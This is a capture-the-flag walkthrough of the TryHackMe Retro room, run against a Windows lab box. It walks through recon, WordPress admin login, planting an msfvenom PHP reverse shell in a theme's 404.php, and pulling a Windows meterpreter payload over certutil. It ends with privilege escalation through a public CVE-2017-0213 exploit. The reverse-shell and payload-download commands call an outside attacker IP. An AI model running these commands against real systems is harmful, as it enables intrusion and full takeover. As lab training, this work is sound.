Drive Off into the Sunset After You Exploit this CVE-2017-0213 Vulnerable Box in Retro CTF
This walkthrough will go over the Retro room found on TryHackMe. The objective behind this room is to use a bit of passive recon to find a set of credentials in order to RDP into the box, identify a vulnerability in the Windows COM (CVE-2017-0213), and privesc to NT AUTHORITY\SYSTEM.
Step 1: What's Out There?
nmap -sC -sV -p- -Pn retro.thm --min-rate=1000
Looks like we have a webserver and an RDP session open. Let's check out what the web server can offer us.
A default Microsoft IIS page. We'll use ffuf to enumerate for directories.
Step 2: FFUF
ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://retro.thm/FUZZ -fs 703
Nice, we discovered a directory called /retro. Let's go to it.
Step 3: Finding Credentials
We discovered a blog that seems to be run by the user Wade.
After downloading and viewing the Comments RSS data, we discovered text that might be a potential password.
Taking this information and plugging it into the Site Admin link allows us to log in to the WordPress admin panel.
Step 4: Initial Foothold
Based on my experience with getting a reverse shell from WordPress, we need to modify the 404.php file and inject our generated reverse-shell payload. We can generate it with msfvenom.
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.13.28.215 LPORT=1337 -f raw -o retro_shell.php
Now let's start initializing our handler so we can catch the shell once it executes.
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST <ATTACKER_IP>
set LPORT 1337
exploit
From here we want to copy our retro_shell.php code and paste it into 404.php. We can do this by navigating to Appearance > Theme Editor > 404 Template. Delete the contents of the 404.php file and paste in your shell. It should look like this.
Now navigate to the file in your browser (http://retro.thm/retro/wp-content/themes/90s-retro/404.php) and it will drop you into a meterpreter session.
Step 5: Detour
Okay, so for some reason I could not get the meterpreter shell to stabilize with the 404.php route. But, that's alright. Sometimes we have to get creative and approach a problem from a different angle... in the end, we still get the same outcome. Root.
So what I decided to do is RDP into the box with the same credentials, upload a payload, set my handler, and catch it with a stable meterpreter session.
Generate a payload using msfvenom.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.13.28.215 LPORT=1337 -f exe -o payload.exe
Start an HTTP server and transfer it over using certutil.
certutil -urlcache -f http://10.13.28.215:8000/payload.exe payload.exe
Now we want to set up our listener and catch the shell. Same as before with a slight modification.
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <ATTACKER_IP>
set LPORT 1337
exploit
Run the payload on the victim box and it will drop you into a meterpreter session.
Step 6: Privesc
We're going to use the Windows Exploit Suggester (WES) to find a way to elevate our privileges. First, we need to collect the system's information in order to pull this off.
systeminfo > sysinfo.txt
Now we can pull it down to our attack box.
From here we can use WES to find a privesc vector (update the database before running):
./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database 2023-08-07-mssb.xls --sysinfo ~/sysinfo.txt --ostext 'windows 10 64-bit' -l
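As an added example (not part of the original walkthrough, and not WES's own code), here is a small Python patch-audit helper that does the core of what WES does with the sysinfo.txt collected above: parse the systeminfo output and report which required KBs are missing. The sample output and KB numbers are constructed placeholders; substitute the KB that actually fixes the CVE you are checking.

```python
import re

# Constructed sample of `systeminfo` output (not captured from the room's box).
# A real capture has many more fields and hotfixes; the KB ids are placeholders.
SAMPLE_SYSINFO = """\
Host Name:                 RETRO
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.14393 N/A Build 14393
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB1111111
                           [02]: KB2222222
                           [03]: KB3333333
Network Card(s):           1 NIC(s) Installed.
"""

# Top-level "Key:   value" lines start in column 0; continuation lines are indented.
KEY_RE = re.compile(r"^(?P<key>[^:\s][^:]*):\s*(?P<val>.*)$")
HOTFIX_RE = re.compile(r"\[\d+\]:\s*(KB\d+)", re.IGNORECASE)


def parse_systeminfo(text):
    """Return (fields, hotfixes): top-level key/value pairs and the set of KB ids."""
    fields, hotfixes = {}, set()
    in_hotfix = False
    for line in text.splitlines():
        m = KEY_RE.match(line)
        if m:
            key, val = m.group("key").strip(), m.group("val").strip()
            fields[key] = val
            # Indented "[nn]: KBxxxxxx" lines only belong to the Hotfix(s) field.
            in_hotfix = key.lower().startswith("hotfix")
            continue
        if in_hotfix:
            hm = HOTFIX_RE.search(line)
            if hm:
                hotfixes.add(hm.group(1).upper())
    return fields, hotfixes


def missing_patches(hotfixes, required):
    """Required KBs (e.g. the update that fixed a known CVE) not present on the host."""
    return sorted(kb.upper() for kb in required if kb.upper() not in hotfixes)


if __name__ == "__main__":
    fields, kbs = parse_systeminfo(SAMPLE_SYSINFO)
    print(fields["OS Name"], fields["OS Version"], fields["System Type"])
    # "KB9999999" stands in for the real fixing KB, which this page does not list.
    print("missing:", missing_patches(kbs, ["KB2222222", "KB9999999"]))
```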
This build of Windows 10 is vulnerable to a Windows COM privesc, CVE-2017-0213. There's a binary that we can use to automate this exploit for us. Let's download it to our attack box and upload it to our victim. Link to binary here: https://github.com/WindowsExploits/Exploits/tree/master/CVE-2017-0213
Once we get it on our victim box we can run it and then move over to our RDP session and find a new CMD shell spawned with NT AUTHORITY\SYSTEM rights.
Finally... this one was very difficult and time-consuming. I ended up going down multiple rabbit holes and failing at stabilizing shells more times than I'd like to admit. But all in all, I can say this box was rewarding and has taught me a lot about Windows privesc. I hope you enjoyed this walkthrough, and as always, Happy Hacking.